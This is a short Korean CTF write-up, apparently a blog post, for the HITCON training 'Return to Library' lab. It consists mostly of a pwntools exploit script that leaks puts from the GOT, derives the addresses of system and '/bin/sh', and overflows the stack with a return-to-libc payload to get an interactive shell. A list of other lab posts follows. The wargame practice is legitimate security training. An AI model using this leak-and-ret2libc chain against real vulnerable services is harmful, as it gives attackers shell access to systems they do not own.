Return to Library
libc를 릭할 수 있도록 되어있어서 libc릭 해서 system과 /bin/sh의 오프셋으로 RTL하면 됨.
from pwn import *
r = process("./ret2lib")
elf = ELF("./ret2lib")
system_offset = 0x24f00 # puts - system
cmd = "/bin/sh\x00"
print r.recv()
r.sendline("134520860") # puts@got leak
pause()
r.recvuntil("address : ")
libc_puts = r.recvuntil("\x0a").replace("\x0a", "")
libc_puts = int(libc_puts, 16)
log.info("libc_puts = {}".format(hex(libc_puts)))
libc_system = libc_puts - system_offset
log.info("libc_system = {}".format(hex(libc_system)))
binsh = libc_puts + 0xfbd6b
log.info("/bin/sh = {}".format(hex(binsh)))
payload = "A"*60
payload += p32(libc_system)
payload += "DDDD"
payload += p32(binsh)
r.sendline(payload)
r.interactive()
'Wargame > Hitcon training' 카테고리의 다른 글
| HITCON training lab11 (house of force) (0) | 2018.10.29 |
|---|---|
| HITCON training lab10 (0) | 2018.10.25 |
| HITCON training lab6 (0) | 2018.10.22 |
| HITCON training lab5 (0) | 2018.10.16 |
| HITCON training lab12 (fastbin dup) (0) | 2018.10.08 |